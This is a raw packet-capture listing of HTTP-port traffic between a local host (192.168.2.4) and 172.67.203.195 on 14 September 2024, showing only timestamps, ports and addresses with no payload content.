                                        Sep 14, 2024 18:31:08.381905079 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381938934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.381961107 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.387533903 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387567043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387615919 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.387708902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387742043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387772083 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.387773991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387806892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387834072 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.387857914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387890100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387914896 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.387923002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387955904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.387975931 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388016939 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388051987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388076067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388086081 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388118029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388139009 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388153076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388205051 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388355017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388389111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388422012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388442993 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388529062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388560057 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388583899 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388592958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388624907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388645887 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388659000 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388705015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388716936 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.388739109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.388792992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389044046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389076948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389110088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389131069 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389142990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389175892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389195919 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389226913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389261007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389286041 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389292955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389326096 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389345884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389377117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389408112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389434099 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389441967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389475107 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389497995 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389507055 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389558077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389561892 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389590979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389625072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389647961 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.389659882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.389719963 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.390094995 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.390281916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.390352964 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.401899099 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.421459913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421642065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421670914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421703100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421736956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421767950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421801090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421833992 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.421933889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.421933889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.421933889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.421933889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.465989113 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466023922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466059923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466093063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466130972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466162920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466197014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466228962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466300011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466329098 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466361046 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466384888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466384888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466384888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466396093 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466427088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466464043 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466481924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466514111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466547012 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466555119 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466576099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466602087 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466644049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466677904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466696024 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466711998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466743946 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466772079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466795921 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466829062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466846943 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466861010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466893911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466909885 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466943026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.466990948 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.466995955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467032909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467065096 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467082977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467106104 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467209101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467211962 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467241049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467291117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467298985 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467324018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467358112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467374086 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467410088 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467462063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467463970 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467494965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467528105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467545033 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467561007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467611074 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467632055 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467642069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467674971 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467694998 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467709064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467742920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467756987 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467777014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467812061 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467830896 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467845917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.467895985 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.467988014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468019962 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468055010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468074083 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468086004 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468117952 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468137026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468169928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468203068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468219995 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468234062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468266010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468285084 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468316078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468348026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468362093 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468381882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468415976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468430996 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468462944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468496084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468512058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468660116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468693018 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468724966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468756914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468774080 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468790054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468825102 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468868017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468899965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468933105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468944073 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.468966007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.468981028 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469016075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469021082 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469048023 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469080925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469099998 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469113111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469146013 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469162941 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469193935 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469227076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469244003 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469259024 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469291925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469310999 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469325066 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469374895 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469376087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469408989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469425917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469440937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469540119 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469573021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469580889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469605923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469623089 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469639063 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469671965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469691038 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469703913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469753027 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.469907999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469939947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469973087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.469995022 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470005989 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470040083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470056057 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470092058 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470125914 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470144987 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470158100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470190048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470221996 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470226049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470279932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470280886 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470314026 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470346928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470362902 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470380068 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470415115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470437050 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.470443010 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.470491886 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.509426117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509495974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509531975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509566069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509599924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509633064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509660959 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.509669065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.509723902 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.509725094 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.552983999 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553015947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553050995 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553100109 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553117990 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553169966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553204060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553205013 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553251028 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553253889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553286076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553313017 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553335905 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553385973 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553395033 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553416014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553463936 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553468943 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553498030 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553530931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553560019 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.553564072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553601027 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.553621054 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554202080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554234982 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554261923 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554269075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554301977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554322958 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554342985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554394007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554399967 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554428101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554459095 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554483891 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554491997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554519892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554548979 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554570913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554605007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554626942 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554636002 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554673910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554689884 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554722071 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554757118 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554778099 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554785967 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554817915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554837942 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554860115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554891109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554923058 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554924011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554958105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.554986000 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.554990053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555039883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555042982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555074930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555107117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555130959 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555141926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555190086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555197001 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555224895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555257082 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555279970 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555289984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555322886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555356026 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555375099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555427074 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555435896 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555463076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555493116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555515051 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555526972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555560112 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555583000 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555594921 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555625916 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555644989 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:08.555665016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555716038 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:08.555721045 CEST4973880192.168.2.4172.67.203.195
